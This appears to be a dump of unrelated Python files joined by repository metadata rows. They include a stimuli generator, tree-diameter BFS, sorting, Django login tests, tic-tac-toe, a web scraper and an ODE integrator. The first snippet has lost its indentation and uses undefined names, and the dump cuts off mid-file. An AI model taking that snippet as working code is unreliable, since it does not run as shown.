stimuli_file = "./pilot-nonce-stimuli.txt"
def read_file(file_name):
category = file_name.split("-")[1]
items = []
with open(file_name) as f:
for line in f.readlines():
l = line.strip()
if len(l) >= 1:
items.append((category,l))
return items
def create_stimuli(roots, contexts):
stimuli = []
for i, (item,root) in enumerate(roots):
condition = i + 1
for category,context in contexts:
root_mod = root
if category != "noun" and root[-1] == "e":
root_mod = root[:-1]
prompt = context.replace("XXX", root)
prompt = prompt.replace("YYY", str(root_mod+"[BLANK1]"), 1).replace("YYY", str(root_mod+"[BLANK1]"), 1)
stimulus = "{condition: \"" + str(condition) + "\", item: \"" + item + "\", category: \"" + category + "\", context: \"" + context + "\", root: \"" + root + "\", prompt: \"" + prompt + "\"}"
stimuli.append(stimulus)
condition = (condition + 1) % 30
return stimuli
### MAIN ###
roots = read_file(nonce_file)
contexts = read_file(noun_file) + read_file(verb_file) + read_file(adjective_file)
stimuli = create_stimuli(roots, contexts)
with open(stimuli_file, "w") as f:
for stimulus in stimuli:
f.write(stimulus)
f.write(",\n")
| true |
6eff6166bf44377d0cc462b658091d7638665f5d | Python | m-and-ms/Competitve-Programming-and-algorithms- | /bfs_diamater_tree.py | UTF-8 | 1,812 | 3.25 | 3 | [] | no_license | # 0
#diameter of n-aray tree using bfs let tree is 1 2
# 2 3 4 4 7 6 d=7 is between 5 and 5 leaves
# 5 7
# 5
from collections import defaultdict
def bfs_diamter(src,num,adj):
queue=[]
visted=[False]*num
dist=[-1]*num
queue.append(src)
visted[src]=True
dist[src]=0
while(len(queue)):
parent=queue.pop(0)
for child in adj[parent]:
if(not visted[child] ):
visted[child]=True
queue.append(child)
dist[child]=dist[parent]+1
big = max(dist)
print(dist)
return((big,dist.index(big)))
def build_adj(adj,u,v):
adj[u].append(v)
def main():
num_nodes= 7
adj=defaultdict(list)
build_adj(adj,1, 2) # 1
build_adj(adj,1, 3) # 2 3 6
# 4 1 5 1 1
build_adj(adj,1, 6)# 2 2
build_adj(adj,2, 4)#
build_adj(adj,2, 1)
build_adj(adj,3, 1)
build_adj(adj,2, 5)#
build_adj(adj,4, 2)
build_adj(adj,5, 2)
build_adj(adj,6, 1)
max_points=get_diameter(adj,1,num_nodes)
def get_diameter(adj,src,num_nodes):
max_point=bfs_diamter(1,num_nodes,adj)
print(max_point)
far_most=bfs_diamter(max_point[1],num_nodes,adj)
total_dst=far_most[0]
print(total_dst)
main()
| true |
ef2e936daf2b572f021bf7b046f733dcd8e81233 | Python | suyashgautam44/Hacker-Rank-projects | /Designer_PDF.py | UTF-8 | 498 | 3.078125 | 3 | [] | no_license | import sys
#h = map(int, raw_input().strip().split(' '))
word = raw_input().strip()
h = [1, 3, 1, 3, 1, 4, 1, 3, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
5, 5, 5, 5, 5, 5]
new_list = []
alphabets = ['a','b','c','d','e','f','g','h','i','j',
'k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
ld = dict(zip(alphabets, h))
#for every element in dictionary, if that element is also in word, get its keys
x = [ld[x] for x in ld if x in word]
y = max(x)*len(word)
print y
| true |
366c04208e7d045180a78f1e1448e40afaa2e4ae | Python | JustinOng/MDP---Group-13 | /algorithms/src/dto/ArenaStringParser.py | UTF-8 | 1,662 | 3.03125 | 3 | [] | no_license | from src.dto.arena import Arena
from src.dto.constants import *
from src.dto.coord import Coord
class ArenaStringParser:
@staticmethod
def parse_arena_string(string: str) -> Arena:
cl = list(string)
arena = Arena()
# set obstacles in arena
obstacle_list = []
i=0
for y in range(MAP_ROW-1, -1, -1): # counting from top to bottom
for x in range(MAP_COL):
coord = Coord(x, y)
if cl[i] == '\n':
i = i + 1
if cl[i] == '1':
arena.get_cell_at_coord(coord).increment_is_obstacle(delta=4)
obstacle_list.append(coord)
elif cl[i] == '0':
pass # not obstacle assumed
i = i+1
if y in [0,MAP_ROW-1] or x in [0,MAP_COL-1]:
# cells at edge of arena are too close to the walls
arena.get_cell_at_coord(coord).set_is_dangerous(True)
# set danger flag for cells too close to obstacles
for obs in obstacle_list:
displacements = [
Coord(-1, -1),
Coord(-1, 0),
Coord(-1, 1),
Coord(0, -1),
Coord(0, 1),
Coord(1, -1),
Coord(1, 0),
Coord(1, 1)
]
for d in displacements:
dangerous_coord = obs.add(d)
if 0 <= dangerous_coord.get_x() < 15 and 0 <= dangerous_coord.get_y() < 20:
arena.get_cell_at_coord(dangerous_coord).set_is_dangerous(True)
return arena
| true |
098d6f49013fb8ffdb2eb83deaf20c52894835b4 | Python | Benjamin1361/python | /hello.py | UTF-8 | 2,416 | 3.234375 | 3 | [] | no_license | """
print('hello')
print('all around the world'[8].upper())
name = 'Ben'
print(name)
age=27
print(age)
fav_food='kebab'
print(fav_food)
print('my_fav_food is {}'.format(fav_food))
print('hello my name is {} and i ma {} years old. {} is my fav food'.format(name, age, fav_food))
i=10
i=i+2
i +=2
print(i)
subtract= 10
subtract -= 5
print(subtract)
fav_drink= 'wine'
print(fav_drink)
my_fav_sport= 'football'
print('may name is {} and {} is my fav sport'.format(name,my_fav_sport))
name= 'Korosh'
age= '37'
favourit_colour= 'red'
my_friend= 'korosh'
print('my friend is {},he is {} and he likes {} as favourit colour'.format (my_friend,age,favourit_colour))
breackfast='milk and toast'
lunch='chiken and rice'
dinner='just sald'
print('I had {} for breackfast, {} for luch and {} for dinner as i can not have heavy meal by night time'.format(breackfast,lunch,dinner))
print(" ")
breackfast='egg'
lunch='sandwich'
dinner='some fruit'
print('I hava plan for tomorrow to have {} for breackfast,{} for lunch time and just {} for dinner'.format(breackfast,lunch,dinner))
from datetime import date
d1=date(1982,12,29)
d2=date(2019,11,12)
delta = d2 - d1
print(delta.days)
print (' | | ')
print (' | | ')
print (' | | ')
print ('--------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
print ('--------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
"""
space1 = 'o'
space2 = 'x'
space3 = ''
space4 = ''
space5 = 'o'
space6 = 'x'
space7 = 'x'
space8 = 'o'
space9 = ''
print ('------------------------')
print (' | | ')
print ('{} | {} | {} '.format(space1, space2, space3))
print (' | | ')
print (' | | ')
print ('------------------------')
print (' | | ')
print (' | | ')
print (' {} | {} {} |'.format(space4,space5,space6))
print (' | | ')
print ('------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
print (' | | ')
print ('------------------------')
| true |
75f8c959741bb5143e7ce13ee2e1f6e505199d49 | Python | NicoR10/PythonUNSAM | /ejercicios_python/burbujeo.py | UTF-8 | 1,167 | 3.390625 | 3 | [] | no_license | import random
import matplotlib.pyplot as plt
lista_1 = [1, 2, -3, 8, 1, 5]
lista_2 = [1, 2, 3, 4, 5]
lista_3 = [0, 9, 3, 8, 5, 3, 2, 4]
lista_4 = [10, 8, 6, 2, -2, -5]
lista_5 = [2, 5, 1, 0]
def ord_burbujeo(lista):
comp_nico = 0
array = lista.copy()
for i in range(len(array), 0, -1):
for j in range(i-1):
comp_nico += 1
if array[j] > array[j+1]:
array[j], array[j+1] = array[j+1], array[j]
return array, comp_nico
ordenada_1, comp_nico1 = ord_burbujeo(lista_1)
ordenada_2, comp_nico2 = ord_burbujeo(lista_2)
ordenada_3, comp_nico3 = ord_burbujeo(lista_3)
ordenada_4, comp_nico4 = ord_burbujeo(lista_4)
ordenada_5, comp_nico5 = ord_burbujeo(lista_5)
comp = []
largo = list(range(1, 257))
n_cuadrado = [n**2 for n in largo]
o_n = [n for n in largo]
for n in range(1, 257):
lista = [random.randint(0,1000) for _ in range(n)]
ordenada, comparaciones = ord_burbujeo(lista)
comp.append(comparaciones)
plt.figure(1)
plt.plot(comp, label='Burbujeo')
plt.plot(n_cuadrado, label='O(n2)')
plt.plot(o_n, label='O(n)')
plt.xlim([1, 100])
plt.ylim([0, 300])
plt.legend(title='Comparaciones') | true |
ddb47f6e1fc64f3cb5873f8af9a5603a06654a12 | Python | irineos/PiDay2019 | /mc_pi.py | UTF-8 | 2,104 | 3.265625 | 3 | [
"MIT"
] | permissive | import numpy as np
import cv2
import random
import math
import matplotlib.pyplot as plt
def point(img,w,h,colour):
img[h,w]=colour
def mc_pi(window_size,points):
r = window_size//2
height, width = window_size+1, window_size+1
img = np.zeros((height, width, 3), np.uint8)
cv2.rectangle(img,(0,0),(r*2,r*2),(255,255,255),2)
cv2.circle(img,(r,r), r, (255,255,255), 2)
total_counter = 0
circle_counter = 0
while True:
for _ in range(10):
x = random.randint(0,2*r)
y = random.randint(0,2*r)
dist = math.sqrt( (r - x)**2 + (r - y)**2 )
if dist < r:
point(img,x,y,(0,255,0))
circle_counter += 1
else:
point(img,x,y,(0,0,255))
total_counter += 1
pi = (circle_counter/total_counter) * 4
if(total_counter > points):
print("points =",points," : ","pi =",pi)
break
cv2.imshow('pi', img)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cv2.destroyAllWindows()
return pi
def autolabel(rects):
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3),
textcoords="offset points",
ha='center', va='bottom')
points = []
pies = []
while True:
print("Enter number of points")
key = input()
if(key == "q"):
break
num_of_points = int(key)
if num_of_points > 0 :
points.append(num_of_points)
pi = mc_pi(600,num_of_points)
pies.append(pi)
points.sort()
x = np.arange(len(points))
width = 0.35
fig, ax = plt.subplots()
rect1 = ax.bar(x , pies, width)
ax.set_ylabel('PI')
ax.set_title('Number Of Points')
ax.set_xticks(x)
ax.set_xticklabels(points)
autolabel(rect1)
fig.tight_layout()
plt.show()
| true |
7da1531c5b97fd1c826e9eb8e31140f3a44c19ed | Python | AnaghaKrish/Two-Pointers-1 | /Problem34.py | UTF-8 | 1,380 | 4.0625 | 4 | [] | no_license | """
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0?
Find all unique triplets in the array which gives the sum of zero.
Note:
The solution set must not contain duplicate triplets.
Example:
Given array nums = [-1, 0, 1, 2, -1, -4],
A solution set is:
[
[-1, 0, 1],
[-1, -1, 2]
]
"""
nums = [-1, 0, 1, 2, -1, -4]
# def 3Sum(array):
nums = sorted(nums)
res = []
for i in range(0, len(nums)-2):
left = i + 1
right = len(nums) -1
if i > 0 and nums[i] == nums[i-1]:
continue
while (left < right):
sum = nums[i] + nums[left] + nums[right]
if sum < 0:
left = left + 1
elif sum > 0:
right = right -1
else:
res.append([nums[i], nums[left], nums[right]])
while left < right and nums[left] == nums[left + 1]:
left = left+1
while left < right and nums[right] == nums[right -1]:
right = right-1
left = left+1
right = right-1
print(res)
"""
1)Sort the array
2)Take three pointers, i which points to the curr element, left and right
3)left = i+1 and right starts from the end of the List
4)sum = i + left + right.
5)if sum > 0: decrement right, <0 increment left else append the values to res.
6)print result
Time Complexity = O(n^3)
Space Complexity = O(n)
"""
| true |
f6c4a2d9e4632376a2847529856e4f3fa87b074d | Python | chenxiaoli/auth21 | /api/tests.py | UTF-8 | 9,466 | 2.765625 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
from django.test import TestCase
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase, APIClient
from . import models
class UserAttributeTests(TestCase):
def test_password_setter(self):
"""设置 password 之后, ``password_hash`` 不为空"""
u = models.User(password='cat')
self.assertTrue(u.password_hash is not None)
def test_no_password_getter(self):
"""获取 password 会触发 AttributeError 异常"""
u = models.User(password='cat')
with self.assertRaises(AttributeError):
print(u.password)
def test_password_verification(self):
"""测试密码验证功能"""
u = models.User(password='cat')
self.assertTrue(u.check_password('cat'))
self.assertFalse(u.check_password('dog'))
def test_password_salts_are_random(self):
"""测试密码盐是随机的"""
u = models.User(password='cat')
u2 = models.User(password='cat')
self.assertTrue(u.password_hash != u2.password_hash)
def test_password_hash(self):
user = models.User()
user.password = '123456'
user.save()
self.assertEqual(user.check_password('123456'), True)
user.password_hash = '21fax.com'
user.save()
self.assertEqual(user.check_password('21fax.com'), True)
class MobilesTestCase(APITestCase):
def test_mobiles(self):
from .helpers import is_mobile
# 测试有效的号段
self.assertTrue(is_mobile('13000000000'))
self.assertTrue(is_mobile('13100000000'))
self.assertTrue(is_mobile('13200000000'))
self.assertTrue(is_mobile('13300000000'))
self.assertTrue(is_mobile('13400000000'))
self.assertTrue(is_mobile('13490000000'))
self.assertTrue(is_mobile('13500000000'))
self.assertTrue(is_mobile('13600000000'))
self.assertTrue(is_mobile('13700000000'))
self.assertTrue(is_mobile('13800000000'))
self.assertTrue(is_mobile('13900000000'))
self.assertTrue(is_mobile('14500000000'))
self.assertTrue(is_mobile('14700000000'))
self.assertTrue(is_mobile('15000000000'))
self.assertTrue(is_mobile('15100000000'))
self.assertTrue(is_mobile('15200000000'))
self.assertTrue(is_mobile('15300000000'))
self.assertTrue(is_mobile('15500000000'))
self.assertTrue(is_mobile('15600000000'))
self.assertTrue(is_mobile('15700000000'))
self.assertTrue(is_mobile('15800000000'))
self.assertTrue(is_mobile('15900000000'))
self.assertTrue(is_mobile('17000000000'))
self.assertTrue(is_mobile('17050000000'))
self.assertTrue(is_mobile('17090000000'))
self.assertTrue(is_mobile('17600000000'))
self.assertTrue(is_mobile('17700000000'))
self.assertTrue(is_mobile('17800000000'))
self.assertTrue(is_mobile('18000000000'))
self.assertTrue(is_mobile('18100000000'))
self.assertTrue(is_mobile('18200000000'))
self.assertTrue(is_mobile('18300000000'))
self.assertTrue(is_mobile('18400000000'))
self.assertTrue(is_mobile('18500000000'))
self.assertTrue(is_mobile('18600000000'))
self.assertTrue(is_mobile('18700000000'))
self.assertTrue(is_mobile('18800000000'))
self.assertTrue(is_mobile('18900000000'))
# 测试无效的号段
self.assertFalse(is_mobile('14000000000'))
self.assertFalse(is_mobile('14100000000'))
self.assertFalse(is_mobile('14200000000'))
self.assertFalse(is_mobile('14300000000'))
self.assertFalse(is_mobile('14400000000'))
self.assertFalse(is_mobile('14600000000'))
self.assertFalse(is_mobile('14800000000'))
self.assertFalse(is_mobile('14900000000'))
self.assertFalse(is_mobile('15400000000'))
self.assertFalse(is_mobile('17100000000'))
self.assertFalse(is_mobile('17200000000'))
self.assertFalse(is_mobile('17300000000'))
self.assertFalse(is_mobile('17400000000'))
self.assertFalse(is_mobile('17500000000'))
self.assertFalse(is_mobile('17900000000'))
# 测试手机号码位数
self.assertTrue(is_mobile('13888888888'))
self.assertFalse(is_mobile('138888888'))
self.assertFalse(is_mobile('1388888888'))
self.assertFalse(is_mobile('138888888888'))
self.assertFalse(is_mobile('1388888888888'))
class UserLoginTests(APITestCase):
def test_login_missing_fields(self):
# 表单不完整
response = self.client.post(reverse('v1:login'))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertContains(response, 'username', count=1, status_code=status.HTTP_400_BAD_REQUEST)
self.assertContains(response, 'password', count=1, status_code=status.HTTP_400_BAD_REQUEST)
def test_login_user_unactivated(self):
_password = '21fax.com'
user = models.User()
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.save()
url = reverse('v1:login')
# 用户名登录
response = self.client.post(
url, {'username': user.username, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# 邮箱登录
response = self.client.post(
url, {'username': user.email, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# 手机登录
response = self.client.post(
url, {'username': user.mobile, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_login_via_username(self):
_password = '21fax.com'
user = models.User()
user.account_state = user.ACCOUNT_STATE_ACTIVATED
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.save()
url = reverse('v1:login')
response = self.client.post(
url, {'username': user.username, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('token', response.data)
def test_login_via_email(self):
_password = '21fax.com'
user = models.User()
user.account_state = user.ACCOUNT_STATE_ACTIVATED
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.save()
url = reverse('v1:login')
response = self.client.post(
url, {'username': user.email, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('token', response.data)
def test_login_via_mobile(self):
_password = '21fax.com'
user = models.User()
user.account_state = user.ACCOUNT_STATE_ACTIVATED
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.save()
url = reverse('v1:login')
response = self.client.post(
url, {'username': user.mobile, 'password': _password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('token', response.data)
def test_login_via_mobile_and_code(self):
_password = '21fax.com'
user = models.User()
user.account_state = user.ACCOUNT_STATE_ACTIVATED
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.save()
sms_auth_token = '21fax.com'
with self.settings(SMS_AUTH_TOKEN=sms_auth_token):
_url = reverse('v1:send_sms_code')
_res = self.client.post(
_url,
{'mobile': user.mobile, 'context': models.SMSCode.CONTEXT_LOGIN, 'token': sms_auth_token},
format='json')
self.assertEqual(_res.status_code, status.HTTP_200_OK)
_code = models.SMSCode.objects.get(mobile=user.mobile, context=models.SMSCode.CONTEXT_LOGIN)
url = reverse('v1:login')
response = self.client.post(
url, {'username': '13866668888', 'password': _code.code}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('token', response.data)
def test_login_via_weixin(self):
_password = '21fax.com'
user = models.User()
user.account_state = user.ACCOUNT_STATE_ACTIVATED
user.username = '21fax'
user.email = 'test@21fax.com'
user.mobile = '13866668888'
user.password = _password
user.wx_openid = 'okweifsodlweka2342oaiflid'
user.save()
url = reverse('v1:login')
response = self.client.post(
url, {'username': user.wx_openid, 'password': 'weixin'}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('token', response.data)
| true |
e458d4270f2635c53acbf7221d1ae3d4645f5fc0 | Python | jijinggang/test_python | /test_config.py | UTF-8 | 862 | 3.390625 | 3 | [] | no_license | from typing import Protocol
import yaml
import toml
txt_yaml = """
site:
port: 80
pages: [homepage, about]
cached: true
lang:
en:
homepage: homepage
about: about
cn:
homepage : 主页
about : 关于
"""
txt_toml = """
[site]
port = 80
pages=['homepage','about']
cached = true
[lang.en]
homepage = 'homepage'
about = 'about'
[lang.cn]
homepage = '主页'
about = '关于'
"""
def assert_data(data):
site = data['site']
assert(site['port'] == 80)
assert(len(site['pages']) == 2)
lang_cn = data['lang']['cn']
assert(lang_cn['about'] == '关于')
def test_yaml():
data = yaml.full_load(txt_yaml)
assert_data(data)
print(yaml.dump(data))
def test_toml():
data = toml.loads(txt_toml)
assert_data(data)
print(toml.dumps(data))
test_yaml()
test_toml()
| true |
09dc9d9329d21c6d64f0e7c511d43fb3c85887a9 | Python | broadlxx/171-172-271python- | /dayi/tutorial 6/Optional.py | UTF-8 | 773 | 3.453125 | 3 | [] | no_license | import random
while True:
Computer_choice=random.randint(0,2)
if Computer_choice==0:
Computer_choice="rock"
elif Computer_choice==1:
Computer_choice="paper"
else :
Computer_choice="scissors"
People_choice=input("Please enter the rock paper scissors randomly: ")
if People_choice==Computer_choice:
print("ping")
elif (People_choice=="rock")and(Computer_choice=="scissors"):
print("you win")
elif (People_choice=="paper")and(Computer_choice=="rock"):
print("you win")
elif (People_choice=="scissors")and(Computer_choice=="paper"):
print("you win")
else:
print("The computer win")
A=int(input("If you want to play again.Please input 1:"))
if A==1:
pass
else:
break
| true |
1c115f88a5871c17e8d7964c90d5887ff71bb225 | Python | daniel-reich/ubiquitous-fiesta | /8vBvgJMc2uQJpD6d7_5.py | UTF-8 | 257 | 3.28125 | 3 | [] | no_license |
def get_prime_factor(num):
for x in range(2, num+1):
if num % x == 0:
return x
def prime_factors(num):
res = []
while 1:
x = get_prime_factor(num)
if not x:
break
res.append(x)
num = num // x
return res
| true |
cbb1bcb33f02b1e6da4fa362d4b5e7b38f8d1888 | Python | erjan/coding_exercises | /count_operations_to_obtain_zero.py | UTF-8 | 1,001 | 4.09375 | 4 | [
"Apache-2.0"
] | permissive | '''
You are given two non-negative integers num1 and num2.
In one operation, if num1 >= num2, you must subtract num2 from num1, otherwise subtract num1 from num2.
For example, if num1 = 5 and num2 = 4, subtract num2 from num1, thus obtaining num1 = 1 and num2 = 4. However, if num1 = 4 and num2 = 5, after one operation, num1 = 4 and num2 = 1.
Return the number of operations required to make either num1 = 0 or num2 = 0.
'''
class Solution:
def countOperations(self, num1: int, num2: int) -> int:
n1 = num1
n2 = num2
c = 0
while n1 != 0 and n2 != 0:
print('n1:', n1, ' n2:', n2)
c += 1
if n1 >= n2:
n1 = n1 - n2
else:
n2 = n2 - n1
print(c)
return c
class Solution:
def countOperations(self, a: int, b: int) -> int:
return 0 if a * b == 0 else a // b + self.countOperations(b, a % b)
| true |
bcd26090d882cd8d0807450ca082de96d06ac7ee | Python | shravani-dev/python_03012021 | /apps/colors/view/colors_table.py | UTF-8 | 368 | 3.5 | 4 | [
"MIT"
] | permissive | def color_table(colors):
table = []
table.append("Id Name Hexcode")
table.append("-----------------------")
if len(colors) < 1:
table.append("There are no colors")
else:
for color in colors:
table.append(f"{str(color['id']).rjust(2)} {color['name'].ljust(12)} {color['hexcode']}")
return "\n".join(table) | true |
2d1e0e23217d5041d4c4c4a1ee29f5e3fa32ebf0 | Python | clamytoe/mc_enchant | /mc_enchant/tools.py | UTF-8 | 5,601 | 2.921875 | 3 | [
"MIT"
] | permissive | import json
from collections import defaultdict
from dataclasses import dataclass, field
from functools import total_ordering
from pathlib import Path
from re import compile, search
from typing import Any, DefaultDict, List
from urllib.request import urlretrieve
from bs4 import BeautifulSoup as Soup
out_dir = Path("/tmp")
html_file = out_dir / "enchantment_list_pc.html"
json_file = Path.home() / "mc_items.json"
HTML_FILE = Path(html_file)
ROMAN = {"I": 1, "II": 2, "III": 3, "IV": 4, "V": 5}
URL = "https://www.digminecraft.com/lists/enchantment_list_pc.php"
@dataclass
@total_ordering
class Enchantment:
"""Minecraft enchantment"""
id_name: str
name: str
max_level: int
description: str
items: List[str] = field(default_factory=list)
def __str__(self):
return f"{self.name} ({self.max_level}): {self.description}"
def __lt__(self, other):
return self.id_name < other.id_name
@dataclass
class Item:
"""Minecraft enchantable item"""
name: str
enchantments: List[Enchantment] = field(default_factory=list)
def __str__(self):
enchants = sorted(self.enchantments)
enc_list = [f"\n [{enc.max_level}] {enc.id_name}" for enc in enchants]
return f"{self.name.title()}: {''.join(enc_list)}"
def clean_up_names(item_names):
"""Cleans up item names
:param item_names: String of item names
:return: String of cleaned up item names
"""
unwanted = (".png", "_sm", "iron_", "enchanted_")
if "fishing_rod" in item_names:
item_names = item_names.replace("fishing_rod", "fishingrod")
for chars in unwanted:
if chars in item_names:
item_names = item_names.replace(chars, "")
item_names = item_names.split("_")
item_names = [
"fishing_rod" if item == "fishingrod" else item for item in item_names
]
return " ".join(item_names)
def enchantable_items(soup):
"""Scrapes BeautifulSoup object for items
:param soup: BeautifulSoup object
:return: List of enchantable items lists
"""
table = soup.find("table", {"id": "minecraft_items"})
items = [
clean_up_names(img["data-src"].split("/")[-1]).split()
for img in table.find_all("img")
]
return items
def export_data(data, out_file=json_file):
"""Exports object data to json format
:param data: Namedtuple of Item objects
:param out_file: Path object to save data to
:return: None
"""
mc_json = json.dumps(data, default=lambda x: x.__dict__)
with out_file.open("w") as f:
json.dump(mc_json, f)
def generate_enchantments(soup):
"""Generates a dictionary of Enchantment objects
:param soup: BeautifulSoup object
:return: DefaultDict of Enchantment objects
"""
item_list = enchantable_items(soup)
data = parse_html(soup)
enchant_data: DefaultDict[Any, Enchantment] = defaultdict(Enchantment)
for i, row in enumerate(data):
id_name, name = split_title(row[0])
max_level = ROMAN[row[1]]
description = row[2]
items = item_list[i]
enchant = Enchantment(id_name, name, max_level, description, items)
enchant_data[id_name] = enchant
return enchant_data
def generate_items(data):
"""Generates a dictionary of Item objects
:param data: DefaultDict of Enchantment objects
:return: DefaultDict of Item objects
"""
mc_items: DefaultDict[Any, Item] = defaultdict(Item)
unique_items = gen_item_set(data)
for item in unique_items:
mc_items[item] = Item(item.replace("_", " "))
for enchant in data:
for item in data[enchant].items:
mc_items[item].enchantments.append(data[enchant])
return mc_items
def gen_item_set(data):
"""Returns a set of item names
:param data: Dictionary of Enchantment objects
:return: Set of sorted item object name strings
"""
mc_items = set()
for enchantment in data.keys():
for item in data[enchantment].items:
mc_items.add(item)
return sorted(mc_items)
def get_soup(file=HTML_FILE):
"""Retrieves source HTML and returns a BeautifulSoup object
:param file: Path file object
:return: BeautifulSoup object
"""
if isinstance(file, Path):
if not file.is_file():
urlretrieve(URL, file)
with file.open() as html_source:
soup = Soup(html_source, "html.parser")
else:
soup = Soup(file, "html.parser")
return soup
def load_data(file=json_file):
"""Loads json file
:param file: Path object to load data from
:return: JSON data
"""
if not file.is_file():
soup = get_soup()
enchantment_data = generate_enchantments(soup)
minecraft_items = generate_items(enchantment_data)
export_data(minecraft_items)
with json_file.open() as f:
json_data = json.loads(f.read())
return json.loads(json_data)
def parse_html(soup):
"""Parses BeautifulSoup object and returns the table
:param soup: BeautifulSoup object
:return: List of the rows that make up the table
"""
table = soup.find("table", {"id": "minecraft_items"})
data = [
[td.get_text() for td in row.find_all("td")] for row in table.find_all("tr")
]
return data[1:]
def split_title(title):
"""
Splits the title string
:param title: String of the enchantment title
:return: Tuple(id_names, names)
"""
pattern = compile(r"(.*)\((.*)\)")
names, id_names = search(pattern, title).groups()
return id_names, names
| true |
2013714a4db216942fd0cb496dd009350796d7b8 | Python | snegyeliczky/Python | /tic-tac-to2.py | UTF-8 | 1,022 | 3.546875 | 4 | [] | no_license | import os
import time
import random
board = [" "," "," "," "," "," "," "," "," "," ",]
def print_board():
print(" "+board[1]+" | "+board[2]+" | "+board[3]+" ")
print("----|---|----")
print(" "+board[4]+" | "+board[5]+" | "+board[6]+" ")
print("----|---|----")
print(" "+board[7]+" | "+board[8]+" | "+board[9]+" ")
def control():
for i in range(len(board)):
if board[i]== "X" and board[i+1] == "X" and board[i+2] == "X":
print("X winn that time")
while True:
os.system("clear")
print_board()
choice = int(input("Please choose an empty space for X: "))
if board[choice] == " ":
board[choice] = "X"
os.system("clear")
print_board()
control()
choice = int(input("Please choose an empty space for O: "))
if board[choice] == " ":
board[choice] = "O"
os.system("clear")
print_board()
else:
print("Sorry that is no good")
time.sleep(1)
| true |
4b6a7236cdeaaf39d23c363e61dfd98312117785 | Python | buc030/parallel_dl_over_tensorflow | /summary_manager.py | UTF-8 | 535 | 2.71875 | 3 | [] | no_license |
import tensorflow as tf
import utils
class SummaryManager:
def __init__(self, path):
self.iter_summaries = []
self.path = path
self.writer = tf.summary.FileWriter(path)
utils.printInfo('TensorBoard path: ' + str(path))
def add_iter_summary(self, s):
self.iter_summaries.append(s)
def merge_iters(self):
#print 'self.iter_summaries = ' + str(self.iter_summaries)
return tf.summary.merge(self.iter_summaries)
def reset(self):
self.iter_summaries = []
| true |
63723e11e966b56bd78c738f01efdee540a0bedc | Python | Sevendeadlys/leetcode | /69/mySqrt.py | UTF-8 | 480 | 3.25 | 3 | [] | no_license | class Solution(object):
def mySqrt(self, x):
"""
:type x: int
:rtype: int
"""
num = 2
while (num**2) < x:
num <<= 1
lo = num>>1
hi = num
while lo <= hi:
mid = (lo+hi)/2
midnum = mid**2
if midnum < x:
lo = mid + 1
elif midnum > x:
hi = mid - 1
else :
return mid
return lo-1
| true |
d7d0795dbae72f642de5c1eae940b4f9d3a11c44 | Python | singularity014/Parallel_Computing_Dask | /computations.py | UTF-8 | 1,012 | 3.78125 | 4 | [] | no_license | from memory_check import memory_footprint
import numpy as np
import pandas as pd
# To be called before we do any operation
before = memory_footprint()
# Let us create a numpy array which takes 50 MB from memory
N = (1024**2)//8 # number of floats that takes 1 MB memory
x = np.random.randn(N*50) #numpy array which takes 1*50 = 50 MB of memory
after = memory_footprint()
print(f"Memory usage before numpy array creation : {before} MB")
print(f"Memory usage after numpy array creation : {after} MB")
print()
before = memory_footprint()
# Square the numpy array without assigning it back to x
x**2
after = memory_footprint()
print(f"Memory usage before squaring : {before} MB")
print(f"Memory usage after squaring : {after} MB")
# ------- further checks ------------
# nbytes in numpy tells the memory usage, then we convert it to MB
print(x.nbytes // (1024 **2))
print()
# memory usage of a dataframe of x
df = pd.DataFrame(x)
print(f'{df.memory_usage(index=False)// (1024**2)} MB taken by dataframe')
| true |
e75ca7f8b428cf1bcd70affac9786429ae2ea5d4 | Python | JoseGuillermoAraya/03Tarea | /Van.py | UTF-8 | 2,780 | 3.328125 | 3 | [
"MIT"
] | permissive | #! /usr/bin/env python
'''Script que realiza RK3 para integrar la ecuación de van der Pol
y grafica el resultado'''
import numpy as np
import matplotlib.pyplot as plt
mu=1.844 #'''parametro de la ecuacion'''
def f (y,m):
'''funcion a la que se le aplica RK3'''
return (m,-y-mu*(y**2-1)*m)
def get_k1(y_n,m_n,h,f):
'''calculo de k1'''
f_n = f(y_n,m_n)
return h*f_n[0],h*f_n[1]
def get_k2(y_n,m_n,h,f):
'''calculo de k2'''
k1 = get_k1(y_n,m_n,h,f)
f_n = f(y_n+k1[0]/2.,m_n+k1[1]/2.)
return k1,(h*f_n[0],h*f_n[1])
def get_k3(y_n,m_n,h,f):
'''calculo de k3'''
k1,k2 = get_k2(y_n,m_n,h,f)
f_n = f(y_n-k1[0]+2*k2[0],m_n-k1[1]+2*k2[1])
return k1,k2,(h*f_n[0],h*f_n[1])
def avanzar_rk3 (y_n,m_n,h,f):
'''recibe los valores en el paso n-esimo de "y" y "m"
y retorna los valores en el paso siguiente'''
k1,k2,k3 = get_k3(y_n,m_n,h,f)
